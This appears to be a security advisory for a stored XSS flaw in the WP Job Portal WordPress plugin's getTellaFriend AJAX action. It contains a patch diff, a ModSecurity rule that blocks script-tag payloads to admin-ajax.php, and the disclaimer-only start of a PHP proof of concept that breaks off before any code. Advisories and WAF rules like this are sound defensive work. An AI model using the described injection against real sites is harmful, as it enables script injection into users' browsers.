-                                'jobapply', 'jobapplyjobmanager', 'getTellaFriend', 'getTellaFriendJobManager', 'deletecompanylogo', 'deleteResumeLogo',
+                                'jobapply', 'jobapplyjobmanager', 'getTellaFriend', 'deletecompanylogo', 'deleteResumeLogo',
                                 'getuserlistajax', 'getLogForUserById', 'getFieldsForComboByFieldFor', 'getSectionToFillValues', 'getUserIdByCompanyid',
                                 'changeNotifyOfNotifications', 'changeViewOfNotifications', 'getOptionsForFieldEdit', 'listdepartments',
                                 'saveTokenInputTag', 'makeJobCopyAjax', 'getsubcategorypopup', 'updateJobApplyResumeStatus', 'getResumeCommentSection',
                                 'getFolderSection', 'saveToFolderResume', 'storeResumeComments', 'setResumeRatting', 'getResumeDetail', 'getEmailFields',
                                 'jobapplyid', 'getFolderSection', 'getFolderSectionJobManager', 'saveToFolderResume', 'sendEmailToJobSeeker',
-                                'setJobApplyRating', 'getResumeDetailJobManager', 'getEmailFieldsJobManager', 'hideTemplateBanner', 'getListTranslations',
+                                'getResumeDetailJobManager', 'getEmailFieldsJobManager', 'hideTemplateBanner', 'getListTranslations',
                                 'validateandshowdownloadfilename', 'getlanguagetranslation', 'getPacakageListByUid', 'canceljobapplyasvisitor',
                                 'visitorapplyjob', 'removeResumeFileById', 'getResumeSectionAjax', 'deleteResumeSectionAjax', 'getOptionsForEditSlug',
-                                'getAllRoleLessUsersAjax', 'getNextJobs', 'getNextTemplateJobs','savetokeninputcity','sendmessageresume', 'sendmailtofriend',
-                                'getJobApplyDetailByid', 'setListStyleSession','sendmailtofriendJobManager', 'getResumeCommentSectionJobManager',
+                                'getAllRoleLessUsersAjax', 'savetokeninputcity','sendmessageresume', 'sendmailtofriend',
+                                'getResumeCommentSectionJobManager',
                                 'getPaymentPopup','getPackagePopupForFeaturedCompany','getPackagePopupForFeaturedJob','getPackagePopupForFeaturedResume',
                                 'getPackagePopupForJobAlert','getPackagePopupJobView','getPackagePopupForCopyJob','getPackagePopupForCompanyContactDetail',
-                                'getPackagePopupForResumeContactDetail','gettagsbytagname','listDepartments','getPackagePopupForDepartment','deleteUserPhoto',
+                                'getPackagePopupForResumeContactDetail','gettagsbytagname','listDepartments','deleteUserPhoto',
                                 'getStripePlans','downloadandinstalladdonfromAjax','getChildForVisibleCombobox','isFieldRequired','getFieldsForComboBySection',
                                 'getUserRoleBasedInfo','storeConfigurationSingle','importZywrapData','checkZywrapApiKey','importZywrapBatchProcess',
                                 'getWrappersByCategory','executeZywrapProxy','getZywrapAllWrappers','getSchemaByUseCode','getAjaxJobs');
--- a/wp-job-portal/includes/breadcrumbs.php
+++ b/wp-job-portal/includes/breadcrumbs.php
@@ -234,7 +234,7 @@
                             break;
                         case 'mysubscriptions':
                             $wpjobportal_array[] = $wpjobportal_staticUrl;
-                            $wpjobportal_array[] = array('link' => wpjobportal::wpjobportal_makeUrl(array('wpjobportalme'=>'purchasehistory', 'wpjobportallt'=>'mysubscriptions')), 'text' => esc_html(__('My Subscription', 'wp-job-portal')));
+                            $wpjobportal_array[] = array('link' => wpjobportal::wpjobportal_makeUrl(array('wpjobportalme'=>'purchasehistory', 'wpjobportallt'=>'mysubscriptions')), 'text' => esc_html(__('My Subscriptions','wp-job-portal')));
                             break;
                         case 'purchasehistory':
                             $wpjobportal_array[] = $wpjobportal_staticUrl;
--- a/wp-job-portal/includes/classes/handlesearchcookies.php
+++ b/wp-job-portal/includes/classes/handlesearchcookies.php
@@ -293,28 +293,6 @@
         WPJOBPORTALincluder::getJSModel('common')->setSearchVariableOnlySortandOrder($this->_jsjp_search_array,$wpjobportal_jstlay);
     }

-    private function searchFormDataForCompanies(){
-        if($this->_callfrom == 1){
-            if(is_admin()){
-                $this->_jsjp_search_array = WPJOBPORTALincluder::getJSModel('company')->getSearchFormAdminCompanyData();
-            }else{
-                $this->_jsjp_search_array = WPJOBPORTALincluder::getJSModel('company')->getSearchFormDataMyCompany();
-            }
-            $this->_setcookies = true;
-        }elseif($this->_callfrom == 2){
-            if(is_admin()){
-                $this->_jsjp_search_array = WPJOBPORTALincluder::getJSModel('company')->getAdminCompanySavedCookies();
-            }else{
-                $this->_jsjp_search_array = WPJOBPORTALincluder::getJSModel('company')->getCookiesSavedMyCompany();
-            }
-        }
-        if(is_admin()){
-            WPJOBPORTALincluder::getJSModel('company')->setAdminCompanySearchVariable($this->_jsjp_search_array);
-        }else{
-            WPJOBPORTALincluder::getJSModel('company')->setSearchVariableMyCompany($this->_jsjp_search_array);
-        }
-    }
-
     private function searchFormDataForCareerLevel(){
         if($this->_callfrom == 1){
             $this->_jsjp_search_array = WPJOBPORTALincluder::getJSModel('careerlevel')->getSearchFormDataCareerLevel();
@@ -377,7 +355,6 @@

     private function setCookiesFromTransientData(){
         $wpjobportal_user_data  =  get_transient( 'wpjobportal-social-login-data');
-        //echo 'printing tranient data from handlecookies class 248 <pre>';print_r($wpjobportal_user_data);echo '</pre>';
         if( $wpjobportal_user_data !== FALSE){ // it will be false if transient does not exsist
             if($wpjobportal_user_data != '' && is_array($wpjobportal_user_data) && !empty($wpjobportal_user_data)){
                 if (!isset($_COOKIE['wpjobportal-socialid'])){
@@ -630,10 +607,6 @@
             return is_array($wpjobportal_data) ? $wpjobportal_data : [];
         }

-        public function getSearchArray() {
-            return $this->_jsjp_search_array;
-        }
-
         private function setCurrentUsertransient($wpjobportal_token, $for) {
             // Full list of valid cases
             $wpjobportal_all_cases = [
@@ -658,4 +631,4 @@


 }
-?>
+?>
 No newline at end of file
--- a/wp-job-portal/includes/classes/jp-shortcodes-widget.php
+++ b/wp-job-portal/includes/classes/jp-shortcodes-widget.php
@@ -56,7 +56,7 @@
 						'wpjobportal_my_resumes' => __('My Resumes', 'wp-job-portal'),
 						'wpjobportal_searchjob' => __('Search Jobs', 'wp-job-portal'),
 						'wpjobportal_searchresume' => __('Search Resumes', 'wp-job-portal'),
-						'wpjobportal_jobbycategory' => __('Jobs by Category', 'wp-job-portal'),
+						'wpjobportal_jobbycategory' => __('Jobs By Categories', 'wp-job-portal'),
 	            ],
 	            'default' => 'wpjobportal_job',
 	        ]
--- a/wp-job-portal/includes/classes/popup.php
+++ b/wp-job-portal/includes/classes/popup.php
@@ -13,25 +13,7 @@
         }
     }

-    function canAutoSubmit($wpjobportal_result){
-        return true;
-        $wpjobportal_totalcredits = 0;
-        $wpjobportal_i = 0;
-        foreach ($wpjobportal_result AS $wpjobportal_value) {
-            $wpjobportal_totalcredits += $wpjobportal_value->credits;
-            $wpjobportal_i++;
-        }
-        if($wpjobportal_i > 1){ // show popup on multioption
-            return false;
-        }
-        if($wpjobportal_totalcredits == 0){
-            return true;
-        }else{
-            return false;
-        }
-    }
-
-     function getPopupForAdmin($wpjobportal_actionname,$wpjobportal_themecall=null,$wpjobportal_pageid=null) {
+    function getPopupForAdmin($wpjobportal_actionname,$wpjobportal_themecall=null,$wpjobportal_pageid=null) {
         $wpjobportal_uid = WPJOBPORTALRequest::getVar('userid');
         $wpjobportal_module = WPJOBPORTALRequest::getVar('module');
         if($wpjobportal_pageid == null){
@@ -532,26 +514,26 @@

         switch ($wpjobportal_actionname) {
             case 'featured_company':
-                $return['popuptitle'] = esc_html(__('Add to','wp-job-portal')) .' '. esc_html(__('featured','wp-job-portal')) .' '. esc_html(__('company', 'wp-job-portal'));
+                $return['popuptitle'] = esc_html(__('Add to','wp-job-portal')) .' '. esc_html(__('Featured','wp-job-portal')) .' '. esc_html(__('company', 'wp-job-portal'));
                 $wpjobportal_id = WPJOBPORTALRequest::getVar('id');
                 $wpjobportal_companyname = WPJOBPORTALincluder::getJSModel('company')->getCompanynameById($wpjobportal_id);
-                $return['title-text'] = esc_html(__('Company name', 'wp-job-portal'));
+                $return['title-text'] = esc_html(__('Company Name', 'wp-job-portal'));
                 $return['title'] = $wpjobportal_companyname;
                 $return['value'] = $wpjobportal_creditsrequired;
                 break;
             case 'featured_job':
-                $return['popuptitle'] = esc_html(__('Add to','wp-job-portal')) .' '. esc_html(__('featured','wp-job-portal')) .' '. esc_html(__('job', 'wp-job-portal'));
+                $return['popuptitle'] = esc_html(__('Add to','wp-job-portal')) .' '. esc_html(__('Featured','wp-job-portal')) .' '. esc_html(__('Job', 'wp-job-portal'));
                 $wpjobportal_id = WPJOBPORTALRequest::getVar('id');
                 $wpjobportal_jobtile = WPJOBPORTALincluder::getJSModel('job')->getJobTitleById($wpjobportal_id);
-                $return['title-text'] = esc_html(__('Job title', 'wp-job-portal'));
+                $return['title-text'] = esc_html(__('Job Title', 'wp-job-portal'));
                 $return['title'] = $wpjobportal_jobtile;
                 $return['value'] = $wpjobportal_creditsrequired;
                 break;
             case 'featured_resume':
-                $return['popuptitle'] = esc_html(__('Add to','wp-job-portal')) .' '. esc_html(__('featured','wp-job-portal')) .' '. esc_html(__('resume', 'wp-job-portal'));
+                $return['popuptitle'] = esc_html(__('Add to','wp-job-portal')) .' '. esc_html(__('Featured','wp-job-portal')) .' '. esc_html(__('resume', 'wp-job-portal'));
                 $wpjobportal_id = WPJOBPORTALRequest::getVar('id');
                 $wpjobportal_resumetile = WPJOBPORTALincluder::getJSModel('resume')->getResumeTitleById($wpjobportal_id);
-                $return['title-text'] = esc_html(__('Resume title', 'wp-job-portal'));
+                $return['title-text'] = esc_html(__('Resume Title', 'wp-job-portal'));
                 $return['title'] = $wpjobportal_resumetile;
                 $return['value'] = $wpjobportal_creditsrequired;
                 break;
@@ -563,7 +545,7 @@
                 break;
             case 'add_job':
                 $return['popuptitle'] = esc_html(__('Add','wp-job-portal')) .' '. esc_html(__('Job', 'wp-job-portal'));
-                $return['title-text'] = esc_html(__('Add','wp-job-portal')) .' '. esc_html(__('job', 'wp-job-portal'));
+                $return['title-text'] = esc_html(__('Add','wp-job-portal')) .' '. esc_html(__('Job', 'wp-job-portal'));
                 $return['title'] = ' ';
                 $return['value'] = $wpjobportal_creditsrequired;
                 break;
@@ -592,19 +574,19 @@
                 $return['value'] = $wpjobportal_creditsrequired;
                 break;
             case 'view_company_contact_detail':
-                $return['popuptitle'] = esc_html(__('View company contact detail', 'wp-job-portal'));
+                $return['popuptitle'] = esc_html(__('View Company Contact Detail', 'wp-job-portal'));
                 $wpjobportal_id = WPJOBPORTALRequest::getVar('id');
                 $wpjobportal_companyname = WPJOBPORTALincluder::getJSModel('company')->getCompanynameById($wpjobportal_id);
-                $return['title-text'] = esc_html(__('View company contact detail', 'wp-job-portal'));
+                $return['title-text'] = esc_html(__('View Company Contact Detail', 'wp-job-portal'));
                 $return['title'] = $wpjobportal_companyname;
                 $return['value'] = $wpjobportal_creditsrequired;
                 $return['link'] = wp_nonce_url(wpjobportal::wpjobportal_makeUrl(array('wpjobportalme'=>'company', 'action'=>'wpjobportaltask', 'task'=>'addviewcontactdetail', 'companyid'=>$wpjobportal_id, 'wpjobportalpageid'=>$wpjobportal_pageid)),'wpjobportal_company_nonce');
                 break;
             case 'view_resume_contact_detail':
-                $return['popuptitle'] = esc_html(__('View resume contact detail', 'wp-job-portal'));
+                $return['popuptitle'] = esc_html(__('View Resume Contact Detail', 'wp-job-portal'));
                 $wpjobportal_id = WPJOBPORTALRequest::getVar('id');
                 $wpjobportal_resumename = WPJOBPORTALincluder::getJSModel('resume')->getResumenameById($wpjobportal_id);
-                $return['title-text'] = esc_html(__('View resume contact detail', 'wp-job-portal'));
+                $return['title-text'] = esc_html(__('View Resume Contact Detail', 'wp-job-portal'));
                 $return['title'] = $wpjobportal_resumename;
                 $return['value'] = $wpjobportal_creditsrequired;
                 $return['link'] = wp_nonce_url(wpjobportal::wpjobportal_makeUrl(array('wpjobportalme'=>'resume', 'action'=>'wpjobportaltask', 'task'=>'addviewresumedetail', 'resumeid'=>$wpjobportal_id, 'wpjobportalpageid'=>$wpjobportal_pageid)),'wpjobportal_resume_nonce');
@@ -616,10 +598,10 @@
                 $return['value'] = $wpjobportal_creditsrequired;
                 break;
             case 'job_apply':
-                $return['popuptitle'] = esc_html(__('Apply On Job', 'wp-job-portal'));
+                $return['popuptitle'] = esc_html(__('Apply On This Job', 'wp-job-portal'));
                 $wpjobportal_id = WPJOBPORTALRequest::getVar('id');
                 $wpjobportal_jobtile = WPJOBPORTALincluder::getJSModel('job')->getJobTitleById($wpjobportal_id);
-                $return['title-text'] = esc_html(__('Job title', 'wp-job-portal'));
+                $return['title-text'] = esc_html(__('Job Title', 'wp-job-portal'));
                 $return['title'] = $wpjobportal_jobtile;
                 $return['value'] = $wpjobportal_creditsrequired;
                 break;
--- a/wp-job-portal/includes/classes/resumeformlayout.php
+++ b/wp-job-portal/includes/classes/resumeformlayout.php
@@ -41,21 +41,6 @@
         return wpjobportal::wpjobportal_getVariableValue(wpjobportal::$wpjobportal_data['fieldtitles'][$wpjobportal_field]);
     }

-    function getResumeFormUserFieldJobManager($title, $wpjobportal_field,$wpjobportal_required) {
-        $wpjobportal_html = '<div class="js-col-md-12 js-form-wrapper">
-        <div class="js-col-md-12 js-form-title '.esc_attr($this->class_prefix).'-bigfont">' . esc_attr($title);
-        if($wpjobportal_required==1){
-            $wpjobportal_html .= '<span class="'.esc_attr($this->class_prefix).'-error-msg">*</span>';
-        }
-        $wpjobportal_html .= '</div>
-            <div class="js-col-md-12 js-form-value">' . $wpjobportal_field . '</div>
-        </div>';
-
-        return $wpjobportal_html;
-    }
-
-
-
     function getResumeFormUserField($wpjobportal_field, $object , $wpjobportal_section , $wpjobportal_sectionid, $wpjobportal_ishidden,$wpjobportal_themecall=null) {
         $wpjobportal_visibleclass = "";
         if (isset($wpjobportal_field->visibleparams) && $wpjobportal_field->visibleparams != ''){
@@ -139,25 +124,6 @@
         return $wpjobportal_data;
     }

-    function getResumeSelectFieldJobManager($wpjobportal_fieldtitle,$wpjobportal_fieldName,$wpjobportal_fieldValue,$wpjobportal_required,$column){
-        $wpjobportal_html="";
-        if($column==4){
-            $wpjobportal_html .= '<div class="js-col-md-3 '.esc_attr($this->class_prefix).'-field-padding">';
-        }else{
-            $wpjobportal_html .= '<div class="js-col-md-12 js-form-wrapper">';
-
-        }
-        $wpjobportal_html .= '
-            <div class="js-col-md-12 js-form-title '.esc_attr($this->class_prefix).'-bigfont">' . $wpjobportal_fieldtitle;
-            if($wpjobportal_required==1){
-                $wpjobportal_html .='<span class="'.esc_attr($this->class_prefix).'-error-msg">*</span>';
-            }
-            $wpjobportal_html .='</div>
-            <div class="js-col-md-12 js-form-value">' . $wpjobportal_fieldValue . '</div>
-        </div>';
-        return $wpjobportal_html;
-    }
-
     function getResumeSelectField($wpjobportal_field, $wpjobportal_fieldValue,$column=0,$wpjobportal_themecall=null) {

         $wpjobportal_fieldtitle="";
@@ -275,53 +241,6 @@
         return $wpjobportal_html;
     }

-    function getFieldForPersonalSectionJobManager($wpjobportal_fieldtitle,$wpjobportal_fieldName,$wpjobportal_fieldValue,$wpjobportal_required,$wpjobportal_extraattr,$columns = 0){
-
-        $wpjobportal_data="";
-
-        if($columns == 3){
-            $wpjobportal_data .= '<div class="js-col-md-4 '.esc_attr($this->class_prefix).'-field-padding">';
-        }else{
-            $wpjobportal_data .= '<div class="js-col-md-12 js-form-wrapper">';
-        }
-        $wpjobportal_data .= '
-            <div class="js-col-md-12 js-form-title '.esc_attr($this->class_prefix).'-bigfont">' . wpjobportal::wpjobportal_getVariableValue($wpjobportal_fieldtitle);
-            if ($wpjobportal_required == 1) {
-                $wpjobportal_data .= '<span class="'.esc_attr($this->class_prefix).'-error-msg"     color: redstyle="color: red;"> *</span>';
-            }
-            $wpjobportal_data .='</div>
-            <div class="js-col-md-12 js-form-value">';
-                $wpjobportal_data .='<input class="inputbox form-control '.esc_attr($this->class_prefix).'-input-field';
-
-                        if ($wpjobportal_required == 1 ) {
-                                $wpjobportal_data .= ' required ';
-                        }
-                        if($wpjobportal_fieldName == "date_of_birth" || $wpjobportal_fieldName == "date_start" ){
-                            $wpjobportal_data .= ' custom_date ';
-                            if($wpjobportal_fieldValue = '0000-00-00 00:00:00'){
-                                $wpjobportal_fieldValue = '';
-                            }
-                        }
-                        $wpjobportal_data .= '"';
-                        if ($wpjobportal_fieldName == "email_address") {
-                            $wpjobportal_data .= ' data-validation="email"';
-                        }
-                        if ($wpjobportal_required == 1 && $wpjobportal_fieldName != "email_address") {
-                            $wpjobportal_data .= ' data-validation="required"';
-                        }
-                $wpjobportal_name = 'sec_1['.$wpjobportal_fieldName.']';
-                $wpjobportal_data .=        ' type="text" name="' . $wpjobportal_name . '" id="' . $wpjobportal_fieldName . '" value = "' .  wpjobportalphplib::wpJP_htmlspecialchars($wpjobportal_fieldValue).'"' ;
-                if (!empty($wpjobportal_extraattr)){
-                    foreach ($wpjobportal_extraattr AS $wpjobportal_key => $wpjobportal_val){
-                        $wpjobportal_data .= ' ' . $wpjobportal_key . '="' . $wpjobportal_val . '"';
-                    }
-                }
-                $wpjobportal_data .= '" />';
-            $wpjobportal_data .='</div>
-        </div>';
-        return $wpjobportal_data;
-    }
-
     function getFieldForPersonalSection($wpjobportal_field, $wpjobportal_fieldValue, $columns = 0,$wpjobportal_extraattr=array(),$wpjobportal_themecall=null) {

         $wpjobportal_fieldtitle = $wpjobportal_field->fieldtitle;
@@ -434,52 +353,6 @@
         }
         return $wpjobportal_data;
     }
-    function getFieldForMultiSectionJobManager($wpjobportal_fieldtitle,$wpjobportal_fieldName,$wpjobportal_required,$wpjobportal_fieldValue,$wpjobportal_field_id_for,$wpjobportal_section, $wpjobportal_sectionid, $wpjobportal_ishidden){
-            $wpjobportal_html = '<div class="js-col-md-12 js-form-wrapper">
-            <div class="js-col-md-12 js-form-title '.esc_attr($this->class_prefix).'-bigfont" for="'.$wpjobportal_field_id_for.'">' . wpjobportal::wpjobportal_getVariableValue($wpjobportal_fieldtitle);
-                if ($wpjobportal_required == 1) {
-                    $wpjobportal_html .= '<span class="'.esc_attr($this->class_prefix).'-error-msg">*</span>';
-                }
-              $wpjobportal_html .='</div>
-            <div class="js-col-md-12 js-form-value">';
-                $wpjobportal_data_required = '';
-                $wpjobportal_class_required = '';
-                if($wpjobportal_ishidden != ''){
-                    if ($wpjobportal_required == 1) {
-                        $wpjobportal_data_required = 'data-myrequired="required"';
-                    }
-                    if ($wpjobportal_fieldName == "email_address") {
-                        $wpjobportal_data_required = 'data-myrequired="required validate-email"';
-                    }
-                }else{
-                    if ($wpjobportal_required == 1) {
-                        $wpjobportal_class_required = ' required';
-                    }
-                    if ($wpjobportal_fieldName == "email_address") {
-                        $wpjobportal_class_required = ' required validate-email';
-                    }
-                }
-
-                $wpjobportal_html .= '<input class="inputbox form-control '.esc_attr($this->class_prefix).'-input-field '.$wpjobportal_class_required.'" '.$wpjobportal_data_required;
-
-                switch ($wpjobportal_section) {
-                    case '2': $wpjobportal_section = 'sec_2'; break;
-                    case '3': $wpjobportal_section = 'sec_3'; break;
-                    case '4': $wpjobportal_section = 'sec_4'; break;
-                    case '5': $wpjobportal_section = 'sec_5'; break;
-                    case '6': $wpjobportal_section = 'sec_6'; break;
-                    case '7': $wpjobportal_section = 'sec_7'; break;
-                    case '8': $wpjobportal_section = 'sec_8'; break;
-                }
-                $wpjobportal_name = $wpjobportal_section."[$wpjobportal_fieldName][$wpjobportal_sectionid]";
-
-                $wpjobportal_html .=    ' type="text" name="' . $wpjobportal_name . '" id="' . $wpjobportal_field_id_for . '" maxlength="250" value = "' .  wpjobportalphplib::wpJP_htmlspecialchars($wpjobportal_fieldValue) . '" />';
-
-            $wpjobportal_html .= '</div>
-        </div>';
-        return $wpjobportal_html;
-
-    }

     function getFieldForMultiSection($wpjobportal_field, $wpjobportal_fieldValue, $wpjobportal_section, $wpjobportal_sectionid, $wpjobportal_ishidden,$wpjobportal_themecall ) {

@@ -693,75 +566,6 @@
         return $wpjobportal_html;
     }

-   function makeResumeSectionFields($wpjobportal_themecall=null){
-        $wpjobportal_resume="";
-        if(isset(wpjobportal::$_data[0]['personal_section'])) $wpjobportal_resume = wpjobportal::$_data[0]['personal_section'];
-        //$wpjobportal_fields_ordering = wpjobportal::$_data[1];
-
-        $wpjobportal_html = '<div id="jssection_resume" class="section_wrapper jssectionwrapper ">';
-        if(empty($wpjobportal_resume->resume)){
-            //$wpjobportal_jssection_hide = (isset(wpjobportal::$wpjobportal_data['resumeid']) && is_numeric(wpjobportal::$wpjobportal_data['resumeid']))?"": 'jssection_hide';
-            $wpjobportal_jssection_hide = 'jssection_hide';
-        }else{
-            ///$wpjobportal_jssection_hide = (isset(wpjobportal::$wpjobportal_data['resumeid']) && is_numeric(wpjobportal::$wpjobportal_data['resumeid']))?"": 'jssection_hide';
-            $wpjobportal_jssection_hide = '';
-        }
-        $wpjobportal_sectionid = 0;
-        // <div class="jsundo wjportal-resume-section-undo"><img class="jsundoimage wjportal-resume-section-undo-image" onclick="undoThisSection(this);" src="'.JURI::root().'components/com_wpjobportal/images/resume/undo-icon.png" /></div>
-        // <img class="jsdeleteimage wjportal-resume-section-delete" onclick="deleteThisSection(this);" src="'.JURI::root().'components/com_wpjobportal/images/resume/delete-icon.png" />
-        $wpjobportal_html .= '<div class="section_wrapper form wjportal-resume-section jssection_wrapper '.$wpjobportal_jssection_hide.' jssection_resume_'.esc_attr($wpjobportal_sectionid).'">';
-        foreach (wpjobportal::$_data[2][6] as $wpjobportal_field) {
-            switch ($wpjobportal_field->field) {
-                case "resume":
-                    $fvalue = isset($wpjobportal_resume->resume) ? $wpjobportal_resume->resume : '';
-                    $wpjobportal_req = ($wpjobportal_field->required ? 'required' : '');
-                    $wpjobportal_data_required = '';
-                    if($wpjobportal_jssection_hide){
-                        if($wpjobportal_req){
-                            $wpjobportal_data_required = 'data-myrequired="required"';
-                            $wpjobportal_req = '';
-                        }
-                    }
-                    $wpjobportal_html .= '
-                        <div class="wpjp-form-wrapper js-col-md-12 js-form-wrapper">
-                            <label id="" class="wpjp-form-title " for="resumeeditor">' . wpjobportal::wpjobportal_getVariableValue($wpjobportal_field->fieldtitle);
-                                if ($wpjobportal_field->required == 1) {
-                                    $wpjobportal_html .= '<span class="error-msg">*</span>';
-                                }
-                    //$wpjobportal_name = 'sec_6[resume]['.esc_attr($wpjobportal_sectionid).']';
-                    $wpjobportal_name = 'resumeeditor';
-
-                    //$wpjobportal_value=wp_editor(isset($wpjobportal_resume->resume) ? $wpjobportal_resume->resume: '', 'resume', array('media_buttons' => false, 'data-validation' => $wpjobportal_req));
-                    $wpjobportal_value=isset($wpjobportal_resume->resume) ? $wpjobportal_resume->resume: '';
-                    $efield = WPJOBPORTALformfield::textarea('resume', $wpjobportal_value, array('class' => 'inputbox one resumeeditor form-control '.esc_attr($this->class_prefix).'-textarea-field', 'height'=>'270px','rows'=>'10','cols'=>'40'));
-                    $efield .= WPJOBPORTALformfield::hidden('resume_edit_val','');
-                    $wpjobportal_html .= '</label>
-                            <div class="wpjp-form-value ">
-                                '.$efield.'
-                            </div>
-                        </div>';
-                    break;
-                default:
-                    $wpjobportal_html .= $this->getResumeFormUserField($wpjobportal_field, $wpjobportal_resume , 6 , $wpjobportal_sectionid, $wpjobportal_jssection_hide,$wpjobportal_themecall);
-                break;
-            }
-        }
-        $wpjobportal_id = '';
-        $wpjobportal_deletethis = (empty($wpjobportal_resume->resume)) ? 1 : 0;
-        $wpjobportal_html .= '<input type="hidden" id="deletethis6'.esc_attr($wpjobportal_sectionid).'" class="jsdeletethissection" name="sec_6[deletethis]['.esc_attr($wpjobportal_sectionid).']" value="'. wpjobportalphplib::wpJP_htmlspecialchars($wpjobportal_deletethis).'">
-                    <input type="hidden" id="id" name="sec_6[id]['.esc_attr($wpjobportal_sectionid).']" value="'.$wpjobportal_id.'">
-            </div></div>';
-        if(empty($wpjobportal_resume->resume)){
-            if(null !=$wpjobportal_themecall){
-                $wpjobportal_html .= '<div class="wpjp-add-new-section-link wjportal-resume-add-new-section-btn" onclick="showResumeSection( this, 'resume');"><i class="fa fa-plus"></i>'.esc_html(__('Add Resume','wp-job-portal')).'</div>';
-            }else{
-                $wpjobportal_html .= '<div class="wpjp-add-new-section-link wjportal-resume-add-new-section-btn" onclick="showResumeSection( this, 'resume');"><i class="fa fa-plus"></i>'.esc_html(__('Add Resume','wp-job-portal')).'</div>';
-
-            }
-        }
-        return $wpjobportal_html;
-    }
-
     /* function makeAddressSectionFields($wpjobportal_themecall=null) {
         $wpjobportal_addresses=array();
         if(isset(wpjobportal::$_data[0]['address_section'])){
--- a/wp-job-portal/includes/classes/resumeviewlayout.php
+++ b/wp-job-portal/includes/classes/resumeviewlayout.php
@@ -73,15 +73,6 @@
         return $wpjobportal_html;
     }

-
-    function getAttachmentRowForViewJobManager($adminLogin) {
-        return $this->getAttachmentRowForViewForTemplate($adminLogin);
-    }
-
-    function getAttachmentRowForViewJobHub($adminLogin) {
-        return $this->getAttachmentRowForViewForTemplate($adminLogin);
-    }
-
     function getAttachmentRowForViewForTemplate($adminLogin) {
         $wpjobportal_html='<div id="'.esc_attr($this->class_prefix).'-resumedetail-attachment" class="'.esc_attr($this->class_prefix).'-resumedetail-section">
             <div class="'.esc_attr($this->class_prefix).'-resumedetail-section-title">
@@ -541,13 +532,6 @@
         if (isset(wpjobportal::$_data[2][1]['first_name']) || isset(wpjobportal::$_data[2][1]['last_name'])) {
             $wpjobportal_layout = WPJOBPORTALrequest::getVar('layout');
             $editsocialclass = '';
-            /*if ($wpjobportal_resumeformview == 0 && ($wpjobportal_layout == 'addresume' || $owner == 1)) {
-                $wpjobportal_html .= '<a class="personal_section_edit" href="#"><img src="' . esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/images/edit-resume.png" /></a>';
-                $editsocialclass = 'editform';
-            }elseif($adminLogin || (!is_user_logged_in() && isset($_SESSION['wp-wpjobportal']))) {
-                $wpjobportal_html .= '<a class="personal_section_edit" href="#"><img src="' . esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/images/edit-resume.png" /></a>';
-                $editsocialclass = 'editform';
-            }*/
             $wpjobportal_html .= '<div id="job-info-sociallink" class="' . $editsocialclass . '">';
             if (!empty(wpjobportal::$_data[0]['personal_section']->facebook)) {
                 if(wpjobportalphplib::wpJP_strstr(wpjobportal::$_data[0]['personal_section']->facebook, 'http') ){
@@ -595,7 +579,7 @@
                 }
             }
             if (isset(wpjobportal::$_data[2][1]['email_address'])) {
-                $wpjobportal_html .= '<div class="wjportal-resume-info"><img src="' . esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/images/email.png" alt="'.esc_attr(__('email','wp-job-portal')).'" title="'.esc_attr(__('email','wp-job-portal')).'" />' . wpjobportal::$_data[0]['personal_section']->email_address . '</div>';
+                $wpjobportal_html .= '<div class="wjportal-resume-info"><img src="' . esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/images/email.png" alt="'.esc_attr(__('Email','wp-job-portal')).'" title="'.esc_attr(__('Email','wp-job-portal')).'" />' . wpjobportal::$_data[0]['personal_section']->email_address . '</div>';
             }

             if (isset(wpjobportal::$_data[2][1]['salaryfixed'])) {
@@ -613,7 +597,7 @@
                 if(isset(wpjobportal::$_data[0]) && !empty(wpjobportal::$_data[0]['personal_section']->address)){
                     $wpjobportal_address = isset(wpjobportal::$_data[0]['address_section'][0]) ?  wpjobportal::$_data[0]['address_section'][0]->address : '';
                     $wpjobportal_country = isset(wpjobportal::$_data[0]['address_section'][0]) ? wpjobportal::$_data[0]['address_section'][0]->countryname : '';
-                    $wpjobportal_html .= '<div class="wjportal-resume-info"><img src="' . esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/images/location.png" alt="'.esc_attr(__('location','wp-job-portal')).'" title="'.esc_attr(__('location','wp-job-portal')).'"/>' . $wpjobportal_address.','.$wpjobportal_country . '</div>';
+                    $wpjobportal_html .= '<div class="wjportal-resume-info"><img src="' . esc_url(WPJOBPORTAL_PLUGIN_URL) . 'includes/images/location.png" alt="'.esc_attr(__('Location','wp-job-portal')).'" title="'.esc_attr(__('Location','wp-job-portal')).'"/>' . $wpjobportal_address.','.$wpjobportal_country . '</div>';
                 }
             }

@@ -730,7 +714,7 @@
             }
         if (wpjobportal::$wpjobportal_data['resumecontactdetail'] == true || $a

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-48880
# Blocks stored XSS exploitation attempts targeting the WP Job Portal getTellaFriend AJAX action
# Filters POST requests to admin-ajax.php with action=getTellaFriend containing script tags in parameters

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20260001,phase:2,deny,status:403,chain,msg:'CVE-2026-48880 - WP Job Portal Stored XSS via getTellaFriend',severity:'CRITICAL',tag:'CVE-2026-48880',tag:'wordpress',tag:'wp-job-portal',tag:'xss'"
  SecRule ARGS_POST:action "@streq getTellaFriend" "chain"
    SecRule ARGS_POST:/.*/ "@rx <script[^>]*>.*</script>" "t:lowercase,t:urlDecodeUni"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
